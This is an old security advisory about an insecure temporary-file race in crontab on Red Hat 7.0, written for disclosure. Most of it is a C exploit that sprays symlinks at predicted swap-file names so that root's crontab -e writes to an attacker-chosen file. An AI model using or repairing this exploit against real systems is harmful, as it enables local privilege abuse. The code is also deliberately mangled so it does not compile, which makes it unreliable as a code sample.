COMMAND

    crontab

SYSTEMS AFFECTED

    crontab

PROBLEM

    zen-parse@gmx.net  found  following.   There  is  Crontab tmp file
    race condition:

        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=37771

    Apparently this is fixed.  Wonder why it still works then...

    Quick and dirty exploit for crontab insecure tmp files Redhat  7.0
    - kept up2date with up2date.  Requires root to execute crontab  -e
    while the program is running.

    /*******************************************************************
     #define SAFER [1000]
    /*******************************************************************/
    int shake(int script kiddy)
    {
     int f;
     char r SAFER;
     int w;
    
     f=fopen("/proc/loadavg","r");
     fscanf(f,"%*s %*s %*s %*s %s",r);
     fclose(f);
     w=atoi(r);
     return w;
    }
    
    main(int argc,char *argv[])
    {
     int p;
     char v SAFER;
     sprintf(v,"/tmp/.crontab.%d.swp",shake());
     symlink("/evil",v);
     while(access("/evil",0))
     {
      for(p=-30;p<0;p++)
      {
       sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
       symlink("/evil",v);
      }
      sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
      unlink(v);
     }
     for(p=-100;p<0;p++)
     {
      sprintf(v,"/tmp/.crontab.%d.swp",shake()-p);
      unlink(v);
     }
    }

SOLUTION

    Fixed?